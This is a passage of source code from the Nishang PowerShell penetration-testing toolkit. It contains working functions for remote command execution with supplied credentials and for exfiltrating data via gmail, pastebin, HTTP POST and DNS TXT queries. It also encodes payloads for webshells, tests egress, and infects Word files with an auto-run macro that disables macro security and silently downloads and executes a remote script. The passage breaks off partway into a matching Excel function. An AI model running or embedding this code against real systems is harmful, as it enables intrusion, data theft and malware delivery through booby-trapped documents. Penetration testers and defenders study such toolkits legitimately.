3700Above command asks the user to provide username and passowrd and creates PSSessions. Use Use-Session to
3701interact with the created sessions.
3702
3703PS > Pivot -Computer <target> -cmd Get-Process -Non_Interactive
3704Above command uses the credentials available with current powershell session (or other shell) to connect to target.
3705It provides a non-interactive pivot. Get-Process is executed on the target.
3706
3707.EXAMPLE
3708PS > Pivot -Computer <target> -User Administrator -Pass P@ssword123# -cmd Get-Process
3709Above command asks the user to provide username and passowrd and creates PSSessions.
3710Get-Process is executed on the target. Use Use-Session to interact with the created sessions.
3711
3712.LINK
3713https://github.com/samratashok/nishang
3714#>
3715
3716
3717
3718 [CmdletBinding()] Param (
3719 [Parameter(Position = 0, Mandatory = $True)]
3720 [String[]]
3721 $Computer,
3722
3723 [Parameter(Position = 1)]
3724 [String]
3725 $User,
3726
3727 [Parameter(Position = 2)]
3728 [String]
3729 $Pass,
3730
3731 [Parameter(Position = 3)]
3732 [String]
3733 $cmd,
3734
3735 [Switch] $Non_Interactive
3736 )
3737
3738 #Interactive pivoting
3739 if ($Non_Interactive -eq $false)
3740 {
3741 if ($User)
3742 {
3743 $Passwd = ConvertTo-SecureString $Pass -AsPlainText -Force
3744 $Creds = New-Object System.Management.Automation.PSCredential ($User, $Passwd)
3745 foreach ($comp in $Computer)
3746 {
3747
3748 New-PSSession -ComputerName $comp -Credential $Creds
3749 }
3750
3751 }
3752 else
3753 {
3754 New-PSSession -ComputerName $Computer
3755
3756 }
3757 }
3758 #Non-Interactive pivoting (command execution on remote machines) using Invoke-Command
3759 if ($Non_Interactive -eq $true)
3760 {
3761 if ($User)
3762 {
3763
3764 $Passwd = ConvertTo-SecureString $Pass -AsPlainText -Force
3765 $Creds = New-Object System.Management.Automation.PSCredential ($User, $Passwd)
3766 $sb = [scriptblock]::Create($cmd)
3767 foreach ($comp in $Computer)
3768 {
3769 $result = Invoke-Command -ComputerName $comp -Credential $Creds -ScriptBlock $sb
3770 "Output of command on $comp " + $result
3771 }
3772 }
3773 else
3774 {
3775 foreach ($comp in $Computer)
3776 {
3777 Invoke-Command -ComputerName $comp -ScriptBlock {$Command}
3778 }
3779
3780 }
3781 }
3782
3783}
3784
3785function Use-Session
3786{
3787<#
3788.SYNOPSIS
3789Function which could be used to interact with sessions created using Pivot.
3790
3791.DESCRIPTION
3792The functionality allows to interact with sessions created using the Pivot function. Use Get-PSSSession to
3793list the sessions created using Pivot.
3794
3795.PARAMETER id
3796ID of the session to interact with.
3797
3798.EXAMPLE
3799PS > Use-Session -id <id>
3800Above command uses the credentials available with current powershell session (or other shell) to connect to target.
3801It creates PSSsessions. Use Use-Session to interact with the created sessions.
3802
3803.LINK
3804https://github.com/samratashok/nishang
3805#>
3806 [CmdletBinding()] Param (
3807 [Parameter(Position = 0, Mandatory = $True)]
3808 $id
3809 )
3810
3811 while($cmd -ne "exit")
3812 {
3813 $sess = Get-PSSession -Id $id
3814 $computername = $sess.ComputerName
3815 write-host -NoNewline "$computername> "
3816 $cmd = read-host
3817 $sb = [scriptblock]::Create($cmd)
3818 Invoke-Command -ScriptBlock $sb -Session $sess
3819 }
3820}
3821
3822
3823#####################################################Exfiltration Functionality################################################
3824
3825function Do-Exfiltration
3826{
3827<#
3828.SYNOPSIS
3829Use this function to exfiltrate data from a target.
3830
3831.DESCRIPTION
3832This function could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
3833and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.
3834
3835.PARAMETER Data
3836The data to be exfiltrated. Could be supplied by pipeline.
3837
3838.PARAMETER ExfilOption
3839The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
3840
3841.PARAMETER dev_key
3842The Unique API key provided by pastebin when you register a free account.
3843Unused for other options
3844
3845.PARAMETER username
3846Username for the pastebin/gmail account where data would be exfiltrated.
3847Unused for other options
3848
3849.PARAMETER password
3850Password for the pastebin/gmail account where data would be exfiltrated.
3851Unused for other options
3852
3853.PARAMETER URL
3854The URL of the webserver where POST requests would be sent.
3855
3856.PARAMETER DomainName
3857The DomainName, whose subdomains would be used for sending TXT queries to.
3858
3859.PARAMETER AuthNS
3860Authoritative Name Server for the domain specified in DomainName
3861
3862
3863.EXAMPLE
3864PS > Get-Information | Do-Exfiltration -ExfilOption gmail -username <> -Password <>
3865
3866Use above command for data exfiltration to gmail
3867
3868.EXAMPLE
3869PS > Get-Information | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
3870
3871Use above command for data exfiltration to a webserver which logs POST requests.
3872
3873
3874.EXAMPLE
3875PS > Get-Information | Do-Exfiltration -ExfilOption DNS -DomainName example.com -AuthNS 192.168.254.228
3876
3877Use above command for data exfiltration to a DNS server which logs TXT queries.
3878
3879
3880.LINK
3881http://labofapenetrationtester.com/
3882https://github.com/samratashok/nishang
3883#>
3884
3885 [CmdletBinding()] Param(
3886
3887 [Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
3888 [String]
3889 $Data,
3890
3891 [Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
3892 [String]
3893 $ExfilOption,
3894
3895 [Parameter(Position = 2, Mandatory = $False)]
3896 [String]
3897 $dev_key,
3898
3899 [Parameter(Position = 3, Mandatory = $False)]
3900 [String]
3901 $username,
3902
3903 [Parameter(Position = 4, Mandatory = $False)]
3904 [String]
3905 $password,
3906
3907 [Parameter(Position = 5, Mandatory = $False)]
3908 [String]
3909 $URL,
3910
3911 [Parameter(Position = 6, Mandatory = $False)]
3912 [String]
3913 $DomainName,
3914
3915 [Parameter(Position = 7, Mandatory = $False)]
3916 [String]
3917 $AuthNS
3918 )
3919
3920 function post_http($url,$parameters)
3921 {
3922 $http_request = New-Object -ComObject Msxml2.XMLHTTP
3923 $http_request.open("POST", $url, $false)
3924 $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
3925 $http_request.setRequestHeader("Content-length", $parameters.length);
3926 $http_request.setRequestHeader("Connection", "close")
3927 $http_request.send($parameters)
3928 $script:session_key=$http_request.responseText
3929 }
3930
3931 function Compress-Encode
3932 {
3933 #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
3934 $ms = New-Object IO.MemoryStream
3935 $action = [IO.Compression.CompressionMode]::Compress
3936 $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
3937 $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
3938 $Data | ForEach-Object {$sw.WriteLine($_)}
3939 $sw.Close()
3940 $Compressed = [Convert]::ToBase64String($ms.ToArray())
3941 return $Compressed
3942 }
3943
3944 if ($exfiloption -eq "pastebin")
3945 {
3946 $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
3947 $pastevalue = [System.Convert]::ToBase64String($utfbytes)
3948 $pastename = "Exfiltrated Data"
3949 post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
3950 post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
3951 }
3952
3953 elseif ($exfiloption -eq "gmail")
3954 {
3955 #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
3956 $smtpserver = "smtp.gmail.com"
3957 $msg = new-object Net.Mail.MailMessage
3958 $smtp = new-object Net.Mail.SmtpClient($smtpServer )
3959 $smtp.EnableSsl = $True
3960 $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
3961 $msg.From = "$username@gmail.com"
3962 $msg.To.Add("$username@gmail.com")
3963 $msg.Subject = "Exfiltrated Data"
3964 $msg.Body = $Data
3965 if ($filename)
3966 {
3967 $att = new-object Net.Mail.Attachment($filename)
3968 $msg.Attachments.Add($att)
3969 }
3970 $smtp.Send($msg)
3971 }
3972
3973 elseif ($exfiloption -eq "webserver")
3974 {
3975 $Data = Compress-Encode
3976 post_http $URL $Data
3977 }
3978 elseif ($ExfilOption -eq "DNS")
3979 {
3980 $code = Compress-Encode
3981 $queries = [int]($code.Length/63)
3982 while ($queries -ne 0)
3983 {
3984 $querystring = $code.Substring($lengthofsubstr,63)
3985 Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
3986 $lengthofsubstr += 63
3987 $queries -= 1
3988 }
3989 $mod = $code.Length%63
3990 $query = $code.Substring($code.Length - $mod, $mod)
3991 Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
3992
3993 }
3994
3995}
3996
3997################################################Compress and Encode scripts and strings###############################
3998function Invoke-Encode
3999{
4000<#
4001.SYNOPSIS
4002Script for Nishang to encode and compress plain data.
4003
4004.DESCRIPTION
4005The script asks for a path to a plain file, encodes it and writes to a file "encoded.txt" in the current working directory.
4006
4007If the switch -OutCommand is used. An encoded command which could be executed on a non-powershell console is also generated.
4008The encoded command is useful in case of non-interactive shells like webshell or when special characters in scripts may
4009create problems, for example, a meterpreter session.
4010
4011.PARAMETER DataToEncode
4012The path of the file to be decoded. Use with -IsString to enter a string.
4013
4014.PARAMETER OutputFilePath
4015The path of the output file. Default is "encoded.txt" in the current working directory.
4016
4017.PARAMETER OutputCommandFilePath
4018The path of the output file where encoded command would be written. Default is "encodedcommand.txt" in the current working directory.
4019
4020.PARAMETER IsString
4021Use this to specify if you are passing a string ins place of a filepath.
4022
4023.PARAMETER OutCommand
4024Generate an encoded command which could be used with -EncodedCommand parameter of PowerShell.
4025
4026.PARAMETER PostScriptCommand
4027Generate a PowerShell command which is much smaller than encoded scripts. Useful in scenrios where
4028longer commands or scripts could not be used.
4029
4030.EXAMPLE
4031
4032PS > Invoke-Encode -DataToEncode C:\scripts\data.txt
4033
4034Use above command to generate encoded data which could be Decoded using the Invoke-Decode script.
4035
4036
4037PS > Invoke-Encode -DataToEncode C:\scripts\evil.ps1 -OutCommand
4038
4039Use above command to generate encoded data and encoded command which could be used on a non-powershell console.
4040Use powershell -EncodedCommand <generated code here>
4041
4042
4043.EXAMPLE
4044
4045PS > Invoke-Encode "A Secret message" -IsString
4046
4047Use above to encode a string.
4048
4049
4050.EXAMPLE
4051
4052PS > Invoke-Encode Get-Process -IsString -OutCommand
4053
4054Use above to encode a command.
4055
4056
4057.LINK
4058http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
4059https://github.com/samratashok/nishang
4060
4061#>
4062 [CmdletBinding()] Param(
4063 [Parameter(Position = 0, Mandatory = $True)]
4064 [String]
4065 $DataToEncode,
4066
4067 [Parameter(Position = 1, Mandatory = $False)]
4068 [String]
4069 $OutputFilePath = ".\encoded.txt",
4070
4071 [Parameter(Position = 2, Mandatory = $False)]
4072 [String]
4073 $OutputCommandFilePath = ".\encodedcommand.txt",
4074
4075 [Switch]
4076 $OutCommand,
4077
4078 [Switch]
4079 $IsString,
4080
4081 [Switch]
4082 $PostScriptCommand
4083
4084 )
4085 if($IsString -eq $true)
4086 {
4087
4088 $Enc = $DataToEncode
4089
4090 }
4091 else
4092 {
4093 $Enc = Get-Content $DataToEncode -Encoding Ascii
4094 }
4095
4096
4097 #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
4098 $ms = New-Object IO.MemoryStream
4099 $action = [IO.Compression.CompressionMode]::Compress
4100 $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
4101 $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
4102 $Enc | ForEach-Object {$sw.WriteLine($_)}
4103 $sw.Close()
4104
4105 # Base64 encode stream
4106 $Compressed = [Convert]::ToBase64String($ms.ToArray())
4107 Out-File -InputObject $Compressed -FilePath $OutputFilePath
4108 Write-Output "Encoded data written to $OutputFilePath"
4109
4110 if (($OutCommand -eq $True) -or ($PostScriptCommand -eq $True))
4111 {
4112 #http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
4113 $command = "Invoke-Expression `$(New-Object IO.StreamReader (" +
4114
4115 "`$(New-Object IO.Compression.DeflateStream (" +
4116
4117 "`$(New-Object IO.MemoryStream (,"+
4118
4119 "`$([Convert]::FromBase64String('$Compressed')))), " +
4120
4121 "[IO.Compression.CompressionMode]::Decompress)),"+
4122
4123 " [Text.Encoding]::ASCII)).ReadToEnd();"
4124
4125 #Generate Base64 encoded command to use with the powershell -encodedcommand paramter"
4126 $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
4127 $EncScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($command))
4128 #Check for max. length supported by Windows. If the base64 encoded command is longer use the other one.
4129 if (($EncScript.Length -gt 8190) -or ($PostScriptCommand -eq $True))
4130 {
4131 Out-File -InputObject $command -FilePath $OutputCommandFilePath
4132 Write-Output "Encoded command written to $OutputCommandFilePath"
4133 }
4134 else
4135 {
4136 Out-File -InputObject $EncScript -FilePath $OutputCommandFilePath
4137 Write-Output "Encoded command written to $OutputCommandFilePath"
4138 }
4139 }
4140}
4141
4142################################################Decode scripts and strings encoded by Invoke-Encode###############################
4143
4144function Invoke-Decode
4145{
4146<#
4147.SYNOPSIS
4148Script for Nishang to decode the data encoded by Invoke-Encode, DNS TXT and POST exfiltration methods.
4149
4150.DESCRIPTION
4151The script asks for an encoded string as an option, decodes it and writes to a file "decoded.txt" in the current working directory.
4152Both the encoding and decoding is based on the code by ikarstein.
4153
4154.PARAMETER EncodedData
4155The path of the file to be decoded. Use with -IsString to enter a string.
4156
4157
4158.PARAMETER OutputFilePath
4159The path of the output file. Default is "decoded.txt" in the current working directory.
4160
4161.PARAMETER IsString
4162Use this to specify if you are passing a string ins place of a filepath.
4163
4164.EXAMPLE
4165
4166PS > Invoke-Decode -EncodedData C:\files\encoded.txt
4167
4168.EXAMPLE
4169
4170PS > Invoke-Decode c08t0Q0oyk9OLS7m5QIA -IsString
4171
4172Use above to decode a string.
4173
4174.LINK
4175http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
4176https://github.com/samratashok/nishang
4177
4178#>
4179 [CmdletBinding()] Param(
4180 [Parameter(Position = 0, Mandatory = $True)]
4181 [String]
4182 $EncodedData,
4183
4184 [Parameter(Position = 1, Mandatory = $False)]
4185 [String]
4186 $OutputFilePath = ".\decoded.txt",
4187
4188 [Switch]
4189 $IsString
4190 )
4191
4192 if($IsString -eq $true)
4193 {
4194
4195 $data = $EncodedData
4196
4197 }
4198 else
4199 {
4200 $data = Get-Content $EncodedData -Encoding UTF8
4201 }
4202 $dec = [System.Convert]::FromBase64String($data)
4203 $ms = New-Object System.IO.MemoryStream
4204 $ms.Write($dec, 0, $dec.Length)
4205 $ms.Seek(0,0) | Out-Null
4206 $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress)
4207 $sr = New-Object System.IO.StreamReader($cs)
4208 $output = $sr.readtoend()
4209 Out-File -InputObject $output -FilePath $OutputFilePath
4210 Write-Host "Decode data written to $OutputFilePath"
4211}
4212
4213############################################### Listener for Egress testing #############################################################
4214<#
4215.SYNOPSIS
4216FireListener is a functions that does egress testing. It is to be run on the attacking/listening machine.
4217
4218.DESCRIPTION
4219FireListener hosts a listening server to which FireBuster can send packets to. Firebuster is to be run on the target machine which is to
4220be tested for egress filtering.
4221
4222.EXAMPLE
4223PS > FireListener -portrange 1000-1020
4224
4225.LINK
4226http://www.labofapenetrationtester.com/2014/04/egress-testing-using-powershell.html
4227https://github.com/samratashok/nishang
4228http://roo7break.co.uk
4229
4230.NOTES
4231Based on the script written by Nikhil ShreeKumar (@roo7break)
4232#>
4233
4234
4235function FireListener
4236{
4237 Param(
4238 [Parameter(Position = 0, Mandatory = $True)]
4239 [String]
4240 $PortRange
4241 )
4242
4243 $ErrorActionPreference = 'SilentlyContinue'
4244 #Code which opens a socket for each port
4245 $socketblock = {
4246 param($port = $args[1])
4247 try
4248 {
4249
4250 $EndPoint = New-Object System.Net.IPEndPoint([ipaddress]::any, $port)
4251 $ListenSocket = New-Object System.Net.Sockets.TCPListener $EndPoint
4252 $ListenSocket.Start()
4253 $RecData = $ListenSocket.AcceptTCPClient()
4254 $clientip = $RecData.Client.RemoteEndPoint.Address.ToString()
4255 $clientport = $RecData.Client.LocalEndPoint.Port.ToString()
4256 Write-Host "$clientip connected through port $clientport" -ForegroundColor Green
4257 $Stream.Close()
4258 $ListenSocket.Stop()
4259 } catch
4260 { Write-Error $Error[0] }
4261 }
4262
4263 [int] $lowport = $portrange.split("-")[0]
4264 [int] $highport = $portrange.split("-")[1]
4265 [int] $ports = 0
4266 Get-Job | Remove-Job
4267
4268 #Start a job for each port
4269 for($ports=$lowport; $ports -le $highport; $ports++)
4270 {
4271 "Listening on port $ports"
4272 $job = start-job -ScriptBlock $socketblock -ArgumentList $ports -Name $ports
4273 }
4274
4275
4276 [console]::TreatControlCAsInput = $true
4277 while ($true)
4278 {
4279 # code from http://poshcode.org/542 to capture Ctrl+C
4280 # start code snip
4281 if ($Host.UI.RawUI.KeyAvailable -and (3 -eq [int]$Host.UI.RawUI.ReadKey("AllowCtrlC,IncludeKeyUp,NoEcho").Character))
4282 {
4283 Write-Host "Stopping all jobs.....This can take many minutes." -Background DarkRed
4284 Sleep 2
4285 Get-Job | Stop-Job
4286 Get-Job | Remove-Job
4287 #Stop-Process -Id $PID
4288 break;
4289 }
4290 # end code snip
4291
4292
4293 #Start a new job which listens on the same port for every completed job.
4294 foreach ($job1 in (Get-Job))
4295 {
4296 Start-Sleep -Seconds 4
4297 Get-Job | Receive-Job
4298 if ($job1.State -eq "Completed")
4299 {
4300 $port = $job1.Name
4301 "Listening on port $port"
4302 $newjobs = start-job -ScriptBlock $socketblock -ArgumentList $port -Name $port
4303 Get-Job | Remove-Job
4304 }
4305 }
4306 }
4307}
4308
4309################################################## Connector for Egress Testing ##########################################################
4310
4311function FireBuster{
4312
4313<#
4314.SYNOPSIS
4315This script is part of Nishang. FireBuster is a PowerShell script that does egress testing. It is to be run on the target machine.
4316
4317.DESCRIPTION
4318FireBuster sends packets to FireListener, which hosts a listening server. By default, FireBuster sends packets to all ports (which could be VERY slow).
4319
4320.EXAMPLE
4321PS> FireBuster 10.10.10.10 1000-1020
4322
4323.EXAMPLE
4324PS> FireBuster 10.10.10.10 1000-1020 -Verbose
4325Use above for increased verbosity.
4326
4327.LINK
4328http://www.labofapenetrationtester.com/2014/04/egress-testing-using-powershell.html
4329https://github.com/samratashok/nishang
4330http://roo7break.co.uk
4331
4332.NOTES
4333Major part of the script is written by Nikhil ShreeKumar (@roo7break)
4334#>
4335
4336 [CmdletBinding()] Param(
4337 [Parameter(Position = 0, Mandatory = $True)]
4338 [String]
4339 $targetip = $(throw "Please specify an EndPoint (Host or IP Address)"),
4340
4341 [Parameter(Position = 1, Mandatory = $False)]
4342 [String] $portrange = "1-65535"
4343 )
4344
4345 $ErrorActionPreference = 'SilentlyContinue'
4346 [int] $lowport = $portrange.split("-")[0]
4347 [int] $highport = $portrange.split("-")[1]
4348
4349 $hostaddr = [system.net.IPAddress]::Parse($targetip)
4350 Write-Verbose "Trying to connect to $hostaddr from $lowport to $highport"
4351 [int] $ports = 0
4352 Write-Host "Sending...."
4353 for($ports=$lowport; $ports -le $highport ; $ports++){
4354 try{
4355 Write-Verbose "Trying port $ports"
4356 $client = New-Object System.Net.Sockets.TcpClient
4357 $beginConnect = $client.BeginConnect($hostaddr,$ports,$null,$null)
4358 $TimeOut = 300
4359 if($client.Connected)
4360 {
4361 Write-Host "Connected to port $ports" -ForegroundColor Green
4362 }
4363 else
4364 {
4365 Start-Sleep -Milli $TimeOut
4366 if($client.Connected)
4367 {
4368 Write-Host "Connected to port $ports" -ForegroundColor Green
4369 }
4370 }
4371 $client.Close()
4372 }catch { Write-Error $Error[0]}
4373 }
4374 Write-Host "Data sent to all ports"
4375}
4376
4377##################################Client Side Attack functions######################################
4378#######################################Out-Word#############################################
4379function Out-Word
4380{
4381<#
4382.SYNOPSIS
4383Nishang Script which can generate and "infect" existing word files with an auto executable macro.
4384
4385.DESCRIPTION
4386The script can create as well as "infect" existing word files with an auto executable macro. Powershell payloads
4387could be exeucted using the genereated files. If a folder is passed to the script it can insert macro in all existing word
4388files in the folder. With the Recurse switch, sub-folders can also be included.
4389For existing files, a new macro enabled doc file is generated from a docx file and for existing .doc files, the macro code is inserted.
4390LastWriteTime of the docx file is set to the newly generated doc file. If the RemoveDocx switch is enabled, the
4391original docx is removed and the data in it is lost.
4392
4393.PARAMETER Payload
4394Payload which you want execute on the target.
4395
4396.PARAMETER PayloadURL
4397URL of the powershell script which would be executed on the target.
4398
4399.PARAMETER Arguments
4400Arguments to the powershell script to be executed on the target.
4401
4402.PARAMETER WordFileDir
4403The directory which contains MS Word files which are to be "infected".
4404
4405.PARAMETER OutputFile
4406The path for the output Word file. Default is Salary_Details.doc in the current directory.
4407
4408.PARAMETER Recurse
4409Recursively look for Word files in the WordFileDir
4410
4411.PARAMETER RemoveDocx
4412When using the WordFileDir to "infect" files in a directory, remove the original ones after creating the infected ones.
4413
4414.PARAMETER RemainSafe
4415Use this switch to turn on Macro Security on your machine after using Out-Word.
4416
4417.EXAMPLE
4418PS > Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"
4419
4420Use above command to provide your own payload to be executed from macro. A file named "Salary_Details.doc" would be generated
4421in the current directory.
4422
4423.EXAMPLE
4424PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1
4425
4426Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file
4427named "Salary_Details.doc" would be generated in user's temp directory.
4428
4429.EXAMPLE
4430PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -Arguments Evil
4431
4432Use above when you want to use the default payload, which is a powershell download and execute one-liner.
4433The Arugment parameter allows to pass arguments to the downloaded script.
4434
4435.EXAMPLE
4436PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -OutputFile C:\docfiles\Generated.doc
4437
4438In above, the output file would be saved to the given path.
4439
4440.EXAMPLE
4441PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles\
4442
4443In above, in the C:\docfiles directory, macro enabled .doc files would be created for all the .docx files, with the same name
4444and same Last MOdified Time.
4445
4446.EXAMPLE
4447PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles\ -Recurse
4448
4449The above command would search recursively for .docx files in C:\docfiles.
4450
4451.EXAMPLE
4452PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\docfiles\ -Recurse -RemoveDocx
4453
4454The above command would search recursively for .docx files in C:\docfiles, generate macro enabled .doc files and
4455delete the original files.
4456
4457.EXAMPLE
4458PS > Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -RemainSafe
4459
4460Out-Word turns off Macro Security. Use -RemainSafe to turn it back on.
4461
4462
4463.LINK
4464http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
4465https://github.com/samratashok/nishang
4466#>
4467
4468 [CmdletBinding()] Param(
4469
4470 [Parameter(Position=0, Mandatory = $False)]
4471 [String]
4472 $Payload,
4473
4474 [Parameter(Position=1, Mandatory = $False)]
4475 [String]
4476 $PayloadURL,
4477
4478 [Parameter(Position=2, Mandatory = $False)]
4479 [String]
4480 $Arguments,
4481
4482 [Parameter(Position=3, Mandatory = $False)]
4483 [String]
4484 $WordFileDir,
4485
4486 [Parameter(Position=4, Mandatory = $False)]
4487 [String]
4488 $OutputFile="$pwd\Salary_Details.doc",
4489
4490
4491 [Parameter(Position=5, Mandatory = $False)]
4492 [Switch]
4493 $Recurse,
4494
4495 [Parameter(Position=6, Mandatory = $False)]
4496 [Switch]
4497 $RemoveDocx,
4498
4499 [Parameter(Position=7, Mandatory = $False)]
4500 [Switch]
4501 $RemainSafe
4502 )
4503
4504 $Word = New-Object -ComObject Word.Application
4505 $WordVersion = $Word.Version
4506
4507 #Check for Office 2007 or Office 2003
4508 if (($WordVersion -eq "12.0") -or ($WordVersion -eq "11.0"))
4509 {
4510 $Word.DisplayAlerts = $False
4511 }
4512 else
4513 {
4514 $Word.DisplayAlerts = "wdAlertsNone"
4515 }
4516 #Turn off Macro Security
4517 New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$WordVersion\word\Security" -Name AccessVBOM -Value 1 -PropertyType DWORD -Force | Out-Null
4518 New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$WordVersion\word\Security" -Name VBAWarnings -Value 1 -PropertyType DWORD -Force | Out-Null
4519
4520 if(!$Payload)
4521 {
4522 $Payload = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
4523 }
4524 #Macro Code
4525 #Macro code from here http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
4526 $code = @"
4527 Sub Document_Open()
4528 Execute
4529
4530 End Sub
4531
4532
4533 Public Function Execute() As Variant
4534 Const HIDDEN_WINDOW = 0
4535 strComputer = "."
4536 Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
4537
4538 Set objStartup = objWMIService.Get("Win32_ProcessStartup")
4539 Set objConfig = objStartup.SpawnInstance_
4540 objConfig.ShowWindow = HIDDEN_WINDOW
4541 Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
4542 objProcess.Create "$Payload", Null, objConfig, intProcessID
4543 End Function
4544"@
4545
4546
4547 if ($WordFileDir)
4548 {
4549 $WordFiles = Get-ChildItem $WordFileDir\* -Include *.doc,*.docx
4550 if ($Recurse -eq $True)
4551 {
4552 $WordFiles = Get-ChildItem -Recurse $WordFileDir\* -Include *.doc,*.docx
4553 }
4554 ForEach ($WordFile in $WordFiles)
4555 {
4556 $Word = New-Object -ComObject Word.Application
4557 $Word.DisplayAlerts = $False
4558 $Doc = $Word.Documents.Open($WordFile.FullName)
4559 $DocModule = $Doc.VBProject.VBComponents.Item(1)
4560 $DocModule.CodeModule.AddFromString($code)
4561 if ($WordFile.Extension -eq ".doc")
4562 {
4563 $Savepath = $WordFile.FullName
4564 }
4565 $Savepath = $WordFile.DirectoryName + "\" + $Wordfile.BaseName + ".doc"
4566 #Append .doc to the original file name if file extensions are hidden for known file types.
4567 if ((Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced).HideFileExt -eq "1")
4568 {
4569 $Savepath = $WordFile.FullName + ".doc"
4570 }
4571 if (($WordVersion -eq "12.0") -or ($WordVersion -eq "11.0"))
4572 {
4573 $Doc.Saveas($SavePath, 0)
4574 }
4575 else
4576 {
4577 $Doc.Saveas([ref]$SavePath, 0)
4578 }
4579 Write-Output "Saved to file $SavePath"
4580 $Doc.Close()
4581 $LastModifyTime = $WordFile.LastWriteTime
4582 $FinalDoc = Get-ChildItem $Savepath
4583 $FinalDoc.LastWriteTime = $LastModifyTime
4584 if ($RemoveDocx -eq $True)
4585 {
4586 Write-Output "Deleting $($WordFile.FullName)"
4587 Remove-Item -Path $WordFile.FullName
4588 }
4589 $Word.quit()
4590 [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Word)
4591 }
4592 }
4593 else
4594 {
4595 $Doc = $Word.documents.add()
4596 $DocModule = $Doc.VBProject.VBComponents.Item(1)
4597 $DocModule.CodeModule.AddFromString($code)
4598 if (($WordVersion -eq "12.0") -or ($WordVersion -eq "11.0"))
4599 {
4600 $Doc.Saveas($OutputFile, 0)
4601 }
4602 else
4603 {
4604 $Doc.Saveas([ref]$OutputFile, [ref]0)
4605 }
4606 Write-Output "Saved to file $OutputFile"
4607 $Doc.Close()
4608 $Word.quit()
4609 [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Word)
4610 }
4611
4612 if ($RemainSafe -eq $True)
4613 {
4614 #Turn on Macro Security
4615 New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$WordVersion\word\Security" -Name AccessVBOM -Value 0 -Force | Out-Null
4616 New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$WordVersion\word\Security" -Name VBAWarnings -Value 0 -Force | Out-Null
4617 }
4618}
4619
4620#######################################Out-Excel#############################################
4621
4622function Out-Excel
4623{
4624
4625<#
4626.SYNOPSIS
4627Nishang Script which can generate and "infect" existing excel files with an auto executable macro.
4628
4629.DESCRIPTION
4630The script can create as well as "infect" existing excel files with an auto executable macro. Powershell payloads
4631could be exeucted using the genereated files. If a folder is passed to the script it can insert macro in all existing excrl
4632files in the folder. With the Recurse switch, sub-folders can also be included.
4633For existing files, a new macro enabled xls file is generated from a xlsx file and for existing .xls files, the macro code is inserted.
4634LastWriteTime of the xlsx file is set to the newly generated xls file. If the RemoveXlsx switch is enabled, the
4635original xlsx is removed and the data in it is lost.
4636
4637.PARAMETER Payload
4638Payload which you want execute on the target.
4639
4640.PARAMETER PayloadURL
4641URL of the powershell script which would be executed on the target.
4642
4643.PARAMETER Arguments
4644Arguments to the powershell script to be executed on the target.
4645
4646.PARAMETER ExcelFileDir
4647The directory which contains MS Excel files which are to be "infected".
4648
4649.PARAMETER OutputFile
4650The path for the output Excel file. Default is Salary_Details.xls in the current directory.
4651
4652.PARAMETER Recurse
4653Recursively look for Excel files in the ExcelFileDir
4654
4655.PARAMETER RemoveXlsx
4656When using the ExcelFileDir to "infect" files in a directory, remove the original ones after creating the infected ones.
4657
4658.PARAMETER RemainSafe
4659Use this switch to turn on Macro Security on your machine after using Out-Excel.
4660
4661.EXAMPLE
